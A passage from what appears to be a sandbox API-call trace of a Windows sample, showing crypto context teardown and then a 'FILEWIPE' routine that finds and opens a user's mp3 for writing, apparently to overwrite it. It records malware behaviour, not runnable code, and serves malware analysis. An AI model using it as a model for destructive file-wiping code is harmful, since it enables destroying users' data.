lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.805] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0186.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.805] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.806] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.806] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0186.806] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.806] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.806] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.806] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0186.806] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.809] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.809] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.810] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.814] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.814] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0186.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.814] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.814] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0186.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.814] CryptDestroyKey (hKey=0x90af18) returned 1 [0186.814] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.814] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.814] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0186.814] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.815] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0186.815] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.815] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.815] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.815] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.815] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.815] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.816] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.816] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.816] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.816] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.816] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.816] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.816] FreeLibrary (hLibModule=0x74f20000) returned 1 [0186.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0186.817] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0186.817] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.817] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.817] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.817] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.821] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.821] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0186.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0186.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x90f56120, ftLastWriteTime.dwHighDateTime=0x1d5d9a1, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 0x90ae18 [0186.821] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0186.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.822] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.822] CharLowerBuffW (in: lpsz="byte[53699]", cchLength=0xb | out: lpsz="byte[53699]") returned 0xb [0186.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.823] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.823] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.823] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0186.823] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0186.823] FreeLibrary (hLibModule=0x75c90000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.824] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.825] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0186.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\jrsqynikkqeitv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0186.825] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.825] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.825] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0186.825] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 